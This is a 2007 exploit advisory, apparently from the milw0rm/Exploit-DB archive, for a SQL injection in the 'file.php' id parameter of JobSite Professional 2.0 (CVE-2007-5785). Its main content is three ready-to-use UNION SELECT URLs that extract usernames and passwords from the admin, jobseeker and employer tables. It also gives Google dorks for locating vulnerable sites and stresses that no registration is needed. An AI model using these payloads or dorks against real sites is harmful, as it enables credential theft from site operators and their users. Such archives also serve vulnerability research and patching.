JobSite Professional 2.0 - 'file.php' SQL Injection

Author: ZynbER
type: webapps
platform: php
port: 
date_added: 2007-10-27 
date_updated:  
verified: 1 
codes: OSVDB-38284;CVE-2007-5785 
tags: 
aliases:  
screenshot_url:  
application_url: 

#########################################################################
JobSite Professional v2.0    Remote SQL Injection Vulnerability
#########################################################################


## AUTHOR : ZynbER
## HOME : NoWhere


## Script WebSite:
http://www.jobsiteprofessional.com

## Dork english version : inurl:index.php?page=en_jobseekers
## Dork french version  : inurl:index.php?page=fr_Candidats


## EXPLOITS :

Vulnerability in (File.php?id=)



http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_admin_users/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_jobseekers/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_employers/*



## Note
No registration is needed!!



## GREETZ  :  MEKNES - SIDIBABA - MARROK - SKIZO - BouKa-BouKa

#########################################################################
JobSite Professional v2.0    Remote SQL Injection Vulnerability
#########################################################################

# milw0rm.com [2007-10-28]